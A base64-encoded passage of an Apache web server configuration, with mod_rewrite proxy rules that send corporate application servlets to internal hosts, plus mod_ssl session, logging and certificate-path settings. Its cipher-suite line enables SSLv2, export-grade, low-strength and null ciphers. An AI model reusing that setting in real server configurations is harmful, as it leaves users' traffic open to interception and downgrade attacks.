Tm9uU2VjX2FwcGVyci5odG1sIFtMXQojCiMjIyMjIyMgSW1hZ2VzIGFuZCBvdGhlciB0eXBlcyBl dGMgICAjIyMjIwogICAgUmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9jb3JwL2FwcHMoLiopJCAgaHR0 cDovL2locXIwM2ExOjgwODcvcHJvZHVjdHMvY29ycC9hcHBzJDEgW1AsTF0gCiMKICAgIFJld3Jp dGVSdWxlIF4vc3RkbnNlYyguKikkICBodHRwOi8vd21zLXdlYnFhL3N0ZCQxIFtQLExdCiAgICBS ZXdyaXRlUnVsZSBeL3dtc25zZWMoLiopJCAgaHR0cDovL3dtcy13ZWJxYSQxIFtQLExdCiAgICBS ZXdyaXRlUnVsZSBeL3N0ZHNlYyguKikkICBodHRwOi8vd21zLXdlYnFhL3N0ZCQxIFtQLExdCiAg ICBSZXdyaXRlUnVsZSBeL3dtc3NlYyguKikkICBodHRwOi8vd21zLXdlYnFhJDEgW1AsTF0KICAg IFJld3JpdGVSdWxlIF4oLy4qKSQgIGh0dHA6Ly93bXMtd2VicWEkMSBbUF0KICAgIFByb3h5UGFz c1JldmVyc2UgICAgLyAgICAgICBodHRwOi8vd21zLXdlYnFhLwoKPC9WaXJ0dWFsSG9zdD4gICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAKIwojIFZpcnR1YWxIb3N0IGV4YW1wbGU6CiMgQWxtb3N0IGFueSBBcGFjaGUgZGlyZWN0 aXZlIG1heSBnbyBpbnRvIGEgVmlydHVhbEhvc3QgY29udGFpbmVyLgojIFRoZSBmaXJzdCBWaXJ0 dWFsSG9zdCBzZWN0aW9uIGlzIHVzZWQgZm9yIHJlcXVlc3RzIHdpdGhvdXQgYSBrbm93bgojIHNl cnZlciBuYW1lLgojCiM8VmlydHVhbEhvc3QgKj4KIyAgICBTZXJ2ZXJBZG1pbiB3ZWJtYXN0ZXJA ZHVtbXktaG9zdC5leGFtcGxlLmNvbQojICAgIERvY3VtZW50Um9vdCAvd3d3L2RvY3MvZHVtbXkt aG9zdC5leGFtcGxlLmNvbQojICAgIFNlcnZlck5hbWUgZHVtbXktaG9zdC5leGFtcGxlLmNvbQoj ICAgIEVycm9yTG9nIGxvZ3MvZHVtbXktaG9zdC5leGFtcGxlLmNvbS1lcnJvcl9sb2cKIyAgICBD dXN0b21Mb2cgbG9ncy9kdW1teS1ob3N0LmV4YW1wbGUuY29tLWFjY2Vzc19sb2cgY29tbW9uCiM8 L1ZpcnR1YWxIb3N0PgoKIzxWaXJ0dWFsSG9zdCBfZGVmYXVsdF86Kj4KIzwvVmlydHVhbEhvc3Q+ CgojIwojIyAgU1NMIEdsb2JhbCBDb250ZXh0CiMjCiMjICBBbGwgU1NMIGNvbmZpZ3VyYXRpb24g aW4gdGhpcyBjb250ZXh0IGFwcGxpZXMgYm90aCB0bwojIyAgdGhlIG1haW4gc2VydmVyIGFuZCBh bGwgU1NMLWVuYWJsZWQgdmlydHVhbCBob3N0cy4KIyMKCiMKIyAgIFNvbWUgTUlNRS10eXBlcyBm b3IgZG93bmxvYWRpbmcgQ2VydGlmaWNhdGVzIGFuZCBDUkxzCiMKPElmRGVmaW5lIFNTTD4KQWRk VHlwZSBhcHBsaWNhdGlvbi94LXg1MDktY2EtY2VydCAuY3J0CkFkZFR5cGUgYXBwbGljYXRpb24v eC1wa2NzNy1jcmwgICAgLmNybAo8L0lmRGVmaW5lPgoKPElmTW9kdWxlIG1vZF9zc2wuYz4KCiMg ICBQYXNzIFBocmFzZSBEaWFsb2c6CiMgICBDb25maWd1cmUgdGhlIHBhc3MgcGhyYXNlIGdhdGhl cmluZyBwcm9jZXNzLgojICAgVGhlIGZpbHRlcmluZyBkaWFsb2cgcHJvZ3JhbSAoYGJ1aWx0aW4n IGlzIGEgaW50ZXJuYWwKIyAgIHRlcm1pbmFsIGRpYWxvZykgaGFzIHRvIHByb3ZpZGUgdGhlIHBh c3MgcGhyYXNlIG9uIHN0ZG91dC4KU1NMUGFzc1BocmFzZURpYWxvZyAgYnVpbHRpbgoKIyAgIElu dGVyLVByb2Nlc3MgU2Vzc2lvbiBDYWNoZToKIyAgIENvbmZpZ3VyZSB0aGUgU1NMIFNlc3Npb24g Q2FjaGU6IEZpcnN0IHRoZSBtZWNoYW5pc20gCiMgICB0byB1c2UgYW5kIHNlY29uZCB0aGUgZXhw aXJpbmcgdGltZW91dCAoaW4gc2Vjb25kcykuClNTTFNlc3Npb25DYWNoZSAgICAgICAgbm9uZQoj U1NMU2Vzc2lvbkNhY2hlICAgICAgICBzaG1odDovdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hl L2xvZ3Mvc3NsX3NjYWNoZSg1MTIwMDApCiNTU0xTZXNzaW9uQ2FjaGUgICAgICAgIHNobWNiOi90 ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvbG9ncy9zc2xfc2NhY2hlKDUxMjAwMCkKI1NTTFNl c3Npb25DYWNoZSAgICAgICAgIGRibTovdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3Mv c3NsX3NjYWNoZQpTU0xTZXNzaW9uQ2FjaGVUaW1lb3V0ICAzMDAKCiMgICBTZW1hcGhvcmU6CiMg ICBDb25maWd1cmUgdGhlIHBhdGggdG8gdGhlIG11dHVhbCBleGNsdXNpb24gc2VtYXBob3JlIHRo ZQojICAgU1NMIGVuZ2luZSB1c2VzIGludGVybmFsbHkgZm9yIGludGVyLXByb2Nlc3Mgc3luY2hy b25pemF0aW9uLiAKU1NMTXV0ZXggIGZpbGU6L3RldXIvY3JlL2FwYWV1MTEvd3d3L2FwYWNoZS9s b2dzL3NzbF9tdXRleAoKIyAgIFBzZXVkbyBSYW5kb20gTnVtYmVyIEdlbmVyYXRvciAoUFJORyk6 CiMgICBDb25maWd1cmUgb25lIG9yIG1vcmUgc291cmNlcyB0byBzZWVkIHRoZSBQUk5HIG9mIHRo ZSAKIyAgIFNTTCBsaWJyYXJ5LiBUaGUgc2VlZCBkYXRhIHNob3VsZCBiZSBvZiBnb29kIHJhbmRv bSBxdWFsaXR5LgojICAgV0FSTklORyEgT24gc29tZSBwbGF0Zm9ybXMgL2Rldi9yYW5kb20gYmxv Y2tzIGlmIG5vdCBlbm91Z2ggZW50cm9weQojICAgaXMgYXZhaWxhYmxlLiBUaGlzIG1lYW5zIHlv dSB0aGVuIGNhbm5vdCB1c2UgdGhlIC9kZXYvcmFuZG9tIGRldmljZQojICAgYmVjYXVzZSBpdCB3 b3VsZCBsZWFkIHRvIHZlcnkgbG9uZyBjb25uZWN0aW9uIHRpbWVzIChhcyBsb25nIGFzCiMgICBp dCByZXF1aXJlcyB0byBtYWtlIG1vcmUgZW50cm9weSBhdmFpbGFibGUpLiBCdXQgdXN1YWxseSB0 aG9zZQojICAgcGxhdGZvcm1zIGFkZGl0aW9uYWxseSBwcm92aWRlIGEgL2Rldi91cmFuZG9tIGRl dmljZSB3aGljaCBkb2Vzbid0CiMgICBibG9jay4gU28sIGlmIGF2YWlsYWJsZSwgdXNlIHRoaXMg b25lIGluc3RlYWQuIFJlYWQgdGhlIG1vZF9zc2wgVXNlcgojICAgTWFudWFsIGZvciBtb3JlIGRl dGFpbHMuClNTTFJhbmRvbVNlZWQgc3RhcnR1cCBidWlsdGluClNTTFJhbmRvbVNlZWQgY29ubmVj dCBidWlsdGluCiNTU0xSYW5kb21TZWVkIHN0YXJ0dXAgZmlsZTovZGV2L3JhbmRvbSAgNTEyCiNT U0xSYW5kb21TZWVkIHN0YXJ0dXAgZmlsZTovZGV2L3VyYW5kb20gNTEyCiNTU0xSYW5kb21TZWVk IGNvbm5lY3QgZmlsZTovZGV2L3JhbmRvbSAgNTEyCiNTU0xSYW5kb21TZWVkIGNvbm5lY3QgZmls ZTovZGV2L3VyYW5kb20gNTEyCgojICAgTG9nZ2luZzoKIyAgIFRoZSBob21lIG9mIHRoZSBkZWRp Y2F0ZWQgU1NMIHByb3RvY29sIGxvZ2ZpbGUuIEVycm9ycyBhcmUKIyAgIGFkZGl0aW9uYWxseSBk dXBsaWNhdGVkIGluIHRoZSBnZW5lcmFsIGVycm9yIGxvZyBmaWxlLiAgUHV0CiMgICB0aGlzIHNv bWV3aGVyZSB3aGVyZSBpdCBjYW5ub3QgYmUgdXNlZCBmb3Igc3ltbGluayBhdHRhY2tzIG9uCiMg ICBhIHJlYWwgc2VydmVyIChpLmUuIHNvbWV3aGVyZSB3aGVyZSBvbmx5IHJvb3QgY2FuIHdyaXRl KS4KIyAgIExvZyBsZXZlbHMgYXJlIChhc2NlbmRpbmcgb3JkZXI6IGhpZ2hlciBvbmVzIGluY2x1 ZGUgbG93ZXIgb25lcyk6CiMgICBub25lLCBlcnJvciwgd2FybiwgaW5mbywgdHJhY2UsIGRlYnVn LgpTU0xMb2cgICAgICAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3Mvc3NsX2VuZ2lu ZV9sb2cKU1NMTG9nTGV2ZWwgaW5mbwoKPC9JZk1vZHVsZT4KCjxJZkRlZmluZSBTU0w+CgojIwoj IyBTU0wgVmlydHVhbCBIb3N0IENvbnRleHQKIyMKCiM8VmlydHVhbEhvc3QgX2RlZmF1bHRfOjg0 NDM+CgpOYW1lVmlydHVhbEhvc3QgMTk0LjM2LjI0NS4xNDU6NTU0MwojTmFtZVZpcnR1YWxIb3N0 IGlocXIwMmExLnBvbmwuY28udWs6NTU0Mwo8VmlydHVhbEhvc3QgcXdmZWV1MjEucG9jZXVyMTo1 NTQzPgogICAgI1NTTEVuYWJsZSAgIAogICAgI1NTTFJlcXVpcmVTU0wgCiAgICBQb3J0IDU1NDMK ICAgIFNlcnZlck5hbWUgcXdmZWV1MjEKICAgIFNlcnZlckFsaWFzIHF3ZmVldTIxLnBvY2V1cjEK ICAgIERvY3VtZW50Um9vdCAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2h0ZG9jcwogICAg RGlyZWN0b3J5SW5kZXggaW5kZXguaHRtbAogICAjIEN1c3RvbUxvZyAvdGV1ci9jcmUvYXBhZXUx MS93d3cvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZyBjb21tb24KICAgIFRyYW5zZmVyTG9nIC90ZXVy L2NyZS9hcGFldTExL3d3dy9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nCiAgICBFcnJvckxvZyAvdGV1 ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3MvZXJyb3JfbG9nCiAgICBSZXdyaXRlRW5naW5l IE9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgCiAgICBSZXdyaXRlTG9nIC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvbG9ncy9y ZXdyaXRlX2xvZwogICAgUmV3cml0ZUxvZ0xldmVsIDkgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgUmV3cml0ZVJ1bGUgIF4kICAv CiMKIyMjIyMjIyBGb3IgQmlsbFByaW50IGFwcGxpY2F0aW9uICAgICAgICAgICMjIyMjCiMgUmV3 cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBwcy9CaWxsUHJp bnQvKC4qKSQKIyBSZXdyaXRlUnVsZSBeL3Byb2R1Y3RzL2NvcnAvYXBwcy9CaWxsUHJpbnQvKC4q KSQgIGh0dHA6Ly9xd2ZlZXUyMS5wb2NldXIxOjg3MjEvcHJvZHVjdHMvY29ycC9hcHBzL0JpbGxQ cmludC8kMSBbUCxMXQojCiMjIyMjIyMgRm9yIEVUUyBhcHBsaWNhdGlvbiAgICAgICAgICAjIyMj IwogICAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBw cy9nZWNzL1NlcnZsZXQoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9TVFJJTkd9IF4oLiop ZXRzKC4qKSQgCiAgICBSZXdyaXRlUnVsZSBeL3Byb2R1Y3RzL2NvcnAvYXBwcy9nZWNzL1NlcnZs ZXQoLiopJCAgaHR0cDovL2locXIwM2ExOjgwODcvcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2Vy dmxldCQxIFtQLExdIAojCiMjIyMjIyMgRm9yIEVDUiBhcHBsaWNhdGlvbiAgICAgICAgICAjIyMj IwogICAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBw cy9nZWNzL1NlcnZsZXQoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9TVFJJTkd9IF4oLiop ZWNyKC4qKSQKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2Vydmxl dCguKikkICBodHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9kdWN0cy9jb3JwL2FwcHMvZ2Vjcy9TZXJ2 bGV0JDEgW1AsTF0gCiMKIyMjIyMjIyBGb3IgQkFTSUMgYXBwbGljYXRpb24gICAgICAgICAgIyMj IyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBeKC4qKS9wcm9kdWN0cy9jb3JwL2Fw cHMvZ2Vjcy9TZXJ2bGV0KC4qKSQKICAgIFJld3JpdGVDb25kICV7UVVFUllfU1RSSU5HfSBeKC4q KWJhc2ljKC4qKSQKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL2dlY3MvU2Vy dmxldCguKikkICBodHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9kdWN0cy9jb3JwL2FwcHMvZ2Vjcy9T ZXJ2bGV0JDEgW1AsTF0gCiMKIyMjIyMjIyBGb3IgRUNTIGFwcGxpY2F0aW9uICAgICAgICAgICMj IyMjCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfVVJJfSAgXiguKikvcHJvZHVjdHMvY29ycC9h cHBzL2Vjcy9TZXJ2bGV0KC4qKSQKICAgIFJld3JpdGVDb25kICV7UVVFUllfU1RSSU5HfSBeKC4q KWdldHMoLiopJCAKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL2Vjcy9TZXJ2 bGV0KC4qKSQgIGh0dHA6Ly9xd2ZlZXUyMS5wb2NldXIxOjU1ODAvcHJvZHVjdHMvY29ycC9hcHBz L2Vjcy9TZXJ2bGV0JDEgW1IsTF0gCiMKIyMjIyMjIyBGb3IgRVRUIGFwcGxpY2F0aW9uICAgICAg ICAgICMjIyMjCiAgICBSZXdyaXRlQ29uZCAle1JFUVVFU1RfVVJJfSAgXiguKikvcHJvZHVjdHMv Y29ycC9hcHBzL2dlY3MvU2VydmxldCguKikkCiAgICBSZXdyaXRlQ29uZCAle1FVRVJZX1NUUklO R30gXiguKilldHQoLiopJAogICAgUmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9jb3JwL2FwcHMvZ2Vj cy9TZXJ2bGV0KC4qKSQgIGh0dHA6Ly9paHFyMDNhMTo4MDg3L3Byb2R1Y3RzL2NvcnAvYXBwcy9n ZWNzL1NlcnZsZXQkMSBbUCxMXSAKIwojIyMjIyMjIEZvciBJVkVTIGFwcGxpY2F0aW9uICAgICAg ICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBeKC4qKS9wcm9kdWN0cy9j b3JwL2FwcHMvdmVzL1NlcnZsZXQoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9TVFJJTkd9 IF4oLiopcG9ubCguKikkIAogICAgUmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9jb3JwL2FwcHMvdmVz L1NlcnZsZXQoLiopJCAgaHR0cDovL3F3ZmVldTIxLnBvY2V1cjE6NTU4MC9wcm9kdWN0cy9jb3Jw L2FwcHMvdmVzL1NlcnZsZXQkMSBbUixMXSAKIwojIyMjIyMjIEZvciBWRVNTRUwgYXBwbGljYXRp b24gICAgICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBeKC4qKS9wcm9k dWN0cy9jb3JwL2FwcHMvdmVzc2VsL1NlcnZsZXQoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVS WV9TVFJJTkd9IF4oLiopdmVzc2VsKC4qKSQgCiAgICBSZXdyaXRlUnVsZSBeL3Byb2R1Y3RzL2Nv cnAvYXBwcy92ZXNzZWwvU2VydmxldCguKikkICBodHRwOi8vcXdmZWV1MjEucG9jZXVyMTo1NTgw L3Byb2R1Y3RzL2NvcnAvYXBwcy92ZXNzZWwvU2VydmxldCQxIFtSLExdIAojCiMjIyMjIyMgRm9y IFBvaW50LVRvLVBvaW50IGFwcGxpY2F0aW9uICMjIyMjCiAgICBSZXdyaXRlQ29uZCAle1JFUVVF U1RfVVJJfSAgXiguKikvcHJvZHVjdHMvY29ycC9hcHBzL1BvaW50X1RvX1BvaW50L1NlcnZsZXQo LiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9TVFJJTkd9IF4oLiopdmVzX1BfVG9fUCguKikk IAogICAgUmV3cml0ZVJ1bGUgXi9wcm9kdWN0cy9jb3JwL2FwcHMvUG9pbnRfVG9fUG9pbnQvU2Vy dmxldCguKikkICBodHRwOi8vcXdmZWV1MjEucG9jZXVyMTo1NTgwL3Byb2R1Y3RzL2NvcnAvYXBw cy9Qb2ludF9Ub19Qb2ludC9TZXJ2bGV0JDEgW1IsTF0gCiMKIyMjIyMjIyBGb3IgVHJhZGVsYW5l IGFwcGxpY2F0aW9uICAgICAgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBe KC4qKS9wcm9kdWN0cy9jb3JwL2FwcHMvdHJhZGVsYW5lL1NlcnZsZXQoLiopJAogICAgUmV3cml0 ZUNvbmQgJXtRVUVSWV9TVFJJTkd9IF4oLiopdHJhZGVsYW5lKC4qKSQgCiAgICBSZXdyaXRlUnVs ZSBeL3Byb2R1Y3RzL2NvcnAvYXBwcy90cmFkZWxhbmUvU2VydmxldCguKikkICBodHRwOi8vcXdm ZWV1MjEucG9jZXVyMTo1NTgwL3Byb2R1Y3RzL2NvcnAvYXBwcy90cmFkZWxhbmUvU2VydmxldCQx IFtSLExdIAojCiMjIyMjIyMgRm9yIFRyYWRlTGFuZSBNYWludGVuYW5jZSAgICAgICAjIyMjIwog ICAgUmV3cml0ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBwcy90 cmFkZWxfbWFpbnQvU2VydmxldCguKikkCiAgICBSZXdyaXRlQ29uZCAle1FVRVJZX1NUUklOR30g XiguKil0cmFkZWxfbWFpbnQoLiopJCAKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9h cHBzL3RyYWRlbF9tYWludC9TZXJ2bGV0KC4qKSQgIGh0dHA6Ly9xd2ZlZXUyMS5wb2NldXIxOjU1 ODAvcHJvZHVjdHMvY29ycC9hcHBzL3RyYWRlbF9tYWludC9TZXJ2bGV0JDEgW1IsTF0gCiMKIyMj IyMjIyBGb3IgU09OWSBSZXF1ZXN0IGZvciBUcmFjayBhbmQgVHJhY2UgIyMjIwogICAgUmV3cml0 ZUNvbmQgJXtSRVFVRVNUX1VSSX0gIF4oLiopL3Byb2R1Y3RzL2NvcnAvYXBwcy9lY3MvU2Vydmxl dC9zb255KC4qKSQKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVjdHMvY29ycC9hcHBzL2Vjcy9TZXJ2 bGV0L3Nvbnk/KC4qKSQgIGh0dHA6Ly9xd2ZlZXUyMS5wb2NldXIxOjU1ODAvcHJvZHVjdHMvY29y cC9hcHBzL2Vjcy9TZXJ2bGV0L3NvbnkkMSBbUixMXQojCiMjIyMjIyMgQWxsb3cgdGhlIFN0YXRp YyBIb21lUGFnZSBvZiBFQ1IgIyMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9ICBe KC4qKS9wcm9kdWN0cy9jb3JwL2FwcHMvZWNyKC4qKSQKICAgIFJld3JpdGVSdWxlIF4vcHJvZHVj dHMvY29ycC9hcHBzL2Vjci9Ib21lUGFnZSguKikkICBodHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9k dWN0cy9jb3JwL2FwcHMvZWNyL0hvbWVQYWdlJDEgIFtQLExdCiMKIyMjIyMjIyBObyBvdGhlciBh cHBsaWNhdGlvbiAgICAgICAgICAgICMjIyMKICAgIFJld3JpdGVDb25kICV7UkVRVUVTVF9VUkl9 ICBeKC4qKS9wcm9kdWN0cy9jb3JwL2FwcHMoLiopJAogICAgUmV3cml0ZUNvbmQgJXtRVUVSWV9T VFJJTkd9IF4oLiopaHRtKC4qKSQgCiAgICBSZXdyaXRlUnVsZSBeL3Byb2R1Y3RzL2NvcnAvYXBw cyguKikkICBodHRwczovL3F3ZmVldTIxLnBvY2V1cjE6NTU0My9TZWNfYXBwZXJyLmh0bWwgW0xd CiMKIyMjIyMjIyBJbWFnZXMgYW5kIG90aGVyIHR5cGVzIGV0YyAgICMjIyMjCiAgICBSZXdyaXRl UnVsZSBeL3Byb2R1Y3RzL2NvcnAvYXBwcyguKikkICBodHRwOi8vaWhxcjAzYTE6ODA4Ny9wcm9k dWN0cy9jb3JwL2FwcHMkMSBbUCxMXQojCiAgICBSZXdyaXRlUnVsZSBeL3N0ZHNlYyguKikkICBo dHRwOi8vd21zLXdlYnFhL3N0ZCQxIFtQLExdCiAgICBSZXdyaXRlUnVsZSBeL3dtc3NlYyguKikk ICBodHRwOi8vd21zLXdlYnFhJDEgW1AsTF0KICAgIFJld3JpdGVSdWxlIF4vc3RkbnNlYyguKikk ICBodHRwOi8vd21zLXdlYnFhL3N0ZCQxIFtQLExdCiAgICBSZXdyaXRlUnVsZSBeL3dtc25zZWMo LiopJCAgaHR0cDovL3dtcy13ZWJxYSQxIFtQLExdCiAgICBSZXdyaXRlUnVsZSBeKC8uKikkICBo dHRwOi8vd21zLXdlYnFhJDEgW1BdCiAgICBQcm94eVBhc3NSZXZlcnNlICAgIC8gICAgICAgaHR0 cDovL3dtcy13ZWJxYS8KCiM8L1ZpcnR1YWxIb3N0PiAKIyAgR2VuZXJhbCBzZXR1cCBmb3IgdGhl IHZpcnR1YWwgaG9zdAojRG9jdW1lbnRSb290ICIvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hl L2h0ZG9jcyIKI1NlcnZlck5hbWUgaWhxcjAyYTEucG9ubC5jby51awojU2VydmVyQWRtaW4gdGFw YWV1MTFAaWhxcjAyYTEucG9ubC5jby51awojRXJyb3JMb2cgL3RldXIvY3JlL2FwYWV1MTEvd3d3 L2FwYWNoZS9sb2dzL2Vycm9yX2xvZwojVHJhbnNmZXJMb2cgL3RldXIvY3JlL2FwYWV1MTEvd3d3 L2FwYWNoZS9sb2dzL2FjY2Vzc19sb2cKCiMgICBTU0wgRW5naW5lIFN3aXRjaDoKIyAgIEVuYWJs ZS9EaXNhYmxlIFNTTCBmb3IgdGhpcyB2aXJ0dWFsIGhvc3QuClNTTEVuZ2luZSBvbgoKIyAgIFNT TCBDaXBoZXIgU3VpdGU6CiMgICBMaXN0IHRoZSBjaXBoZXJzIHRoYXQgdGhlIGNsaWVudCBpcyBw ZXJtaXR0ZWQgdG8gbmVnb3RpYXRlLgojICAgU2VlIHRoZSBtb2Rfc3NsIGRvY3VtZW50YXRpb24g Zm9yIGEgY29tcGxldGUgbGlzdC4KU1NMQ2lwaGVyU3VpdGUgQUxMOiFBREg6IUVYUE9SVDU2OlJD NCtSU0E6K0hJR0g6K01FRElVTTorTE9XOitTU0x2MjorRVhQOitlTlVMTAoKIyAgIFNlcnZlciBD ZXJ0aWZpY2F0ZToKIyAgIFBvaW50IFNTTENlcnRpZmljYXRlRmlsZSBhdCBhIFBFTSBlbmNvZGVk IGNlcnRpZmljYXRlLiAgSWYKIyAgIHRoZSBjZXJ0aWZpY2F0ZSBpcyBlbmNyeXB0ZWQsIHRoZW4g eW91IHdpbGwgYmUgcHJvbXB0ZWQgZm9yIGEKIyAgIHBhc3MgcGhyYXNlLiAgTm90ZSB0aGF0IGEg a2lsbCAtSFVQIHdpbGwgcHJvbXB0IGFnYWluLiBBIHRlc3QKIyAgIGNlcnRpZmljYXRlIGNhbiBi ZSBnZW5lcmF0ZWQgd2l0aCBgbWFrZSBjZXJ0aWZpY2F0ZScgdW5kZXIKIyAgIGJ1aWx0IHRpbWUu IEtlZXAgaW4gbWluZCB0aGF0IGlmIHlvdSd2ZSBib3RoIGEgUlNBIGFuZCBhIERTQQojICAgY2Vy dGlmaWNhdGUgeW91IGNhbiBjb25maWd1cmUgYm90aCBpbiBwYXJhbGxlbCAodG8gYWxzbyBhbGxv dwojICAgdGhlIHVzZSBvZiBEU0EgY2lwaGVycywgZXRjLikKI1NTTENlcnRpZmljYXRlRmlsZSAv dGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NvbmYvc3NsLmNydC9zZXJ2ZXIuY3J0ClNTTENl cnRpZmljYXRlRmlsZSAvdGV1ci9jcmUvYXBhZXUxMS93d3cvb3BlbnNzbC9jZXJ0cy93d3cucG9u bC5jb20uMTI4LmNydAojU1NMQ2VydGlmaWNhdGVGaWxlIC90ZXVyL2NyZS9hcGFldTExL3d3dy9h cGFjaGUvY29uZi9zc2wuY3J0L3NlcnZlci1kc2EuY3J0CgojICAgU2VydmVyIFByaXZhdGUgS2V5 OgojICAgSWYgdGhlIGtleSBpcyBub3QgY29tYmluZWQgd2l0aCB0aGUgY2VydGlmaWNhdGUsIHVz ZSB0aGlzCiMgICBkaXJlY3RpdmUgdG8gcG9pbnQgYXQgdGhlIGtleSBmaWxlLiAgS2VlcCBpbiBt aW5kIHRoYXQgaWYKIyAgIHlvdSd2ZSBib3RoIGEgUlNBIGFuZCBhIERTQSBwcml2YXRlIGtleSB5 b3UgY2FuIGNvbmZpZ3VyZQojICAgYm90aCBpbiBwYXJhbGxlbCAodG8gYWxzbyBhbGxvdyB0aGUg dXNlIG9mIERTQSBjaXBoZXJzLCBldGMuKQojU1NMQ2VydGlmaWNhdGVLZXlGaWxlIC90ZXVyL2Ny ZS9hcGFldTExL3d3dy9hcGFjaGUvY29uZi9zc2wua2V5L3NlcnZlci5rZXkKI1NTTENlcnRpZmlj YXRlS2V5RmlsZSAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NvbmYvc3NsLmtleS9zZXJ2 ZXItZHNhLmtleQpTU0xDZXJ0aWZpY2F0ZUtleUZpbGUgL3RldXIvY3JlL2FwYWV1MTEvd3d3L29w ZW5zc2wvY2VydHMvd3d3LnBvbmwuY29tLjEyOC5rZXkKIyAgIFNlcnZlciBDZXJ0aWZpY2F0ZSBD aGFpbjoKIyAgIFBvaW50IFNTTENlcnRpZmljYXRlQ2hhaW5GaWxlIGF0IGEgZmlsZSBjb250YWlu aW5nIHRoZQojICAgY29uY2F0ZW5hdGlvbiBvZiBQRU0gZW5jb2RlZCBDQSBjZXJ0aWZpY2F0ZXMg d2hpY2ggZm9ybSB0aGUKIyAgIGNlcnRpZmljYXRlIGNoYWluIGZvciB0aGUgc2VydmVyIGNlcnRp ZmljYXRlLiBBbHRlcm5hdGl2ZWx5CiMgICB0aGUgcmVmZXJlbmNlZCBmaWxlIGNhbiBiZSB0aGUg c2FtZSBhcyBTU0xDZXJ0aWZpY2F0ZUZpbGUKIyAgIHdoZW4gdGhlIENBIGNlcnRpZmljYXRlcyBh cmUgZGlyZWN0bHkgYXBwZW5kZWQgdG8gdGhlIHNlcnZlcgojICAgY2VydGlmaWNhdGUgZm9yIGNv bnZpbmllbmNlLgojU1NMQ2VydGlmaWNhdGVDaGFpbkZpbGUgL3RldXIvY3JlL2FwYWV1MTEvd3d3 L2FwYWNoZS9jb25mL3NzbC5jcnQvY2EuY3J0CgojICAgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IChD QSk6CiMgICBTZXQgdGhlIENBIGNlcnRpZmljYXRlIHZlcmlmaWNhdGlvbiBwYXRoIHdoZXJlIHRv IGZpbmQgQ0EKIyAgIGNlcnRpZmljYXRlcyBmb3IgY2xpZW50IGF1dGhlbnRpY2F0aW9uIG9yIGFs dGVybmF0aXZlbHkgb25lCiMgICBodWdlIGZpbGUgY29udGFpbmluZyBhbGwgb2YgdGhlbSAoZmls ZSBtdXN0IGJlIFBFTSBlbmNvZGVkKQojICAgTm90ZTogSW5zaWRlIFNTTENBQ2VydGlmaWNhdGVQ YXRoIHlvdSBuZWVkIGhhc2ggc3ltbGlua3MKIyAgICAgICAgIHRvIHBvaW50IHRvIHRoZSBjZXJ0 aWZpY2F0ZSBmaWxlcy4gVXNlIHRoZSBwcm92aWRlZAojICAgICAgICAgTWFrZWZpbGUgdG8gdXBk YXRlIHRoZSBoYXNoIHN5bWxpbmtzIGFmdGVyIGNoYW5nZXMuCiNTU0xDQUNlcnRpZmljYXRlUGF0 aCAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NvbmYvc3NsLmNydAojU1NMQ0FDZXJ0aWZp Y2F0ZUZpbGUgL3RldXIvY3JlL2FwYWV1MTEvd3d3L2FwYWNoZS9jb25mL3NzbC5jcnQvY2EtYnVu ZGxlLmNydAoKIyAgIENlcnRpZmljYXRlIFJldm9jYXRpb24gTGlzdHMgKENSTCk6CiMgICBTZXQg 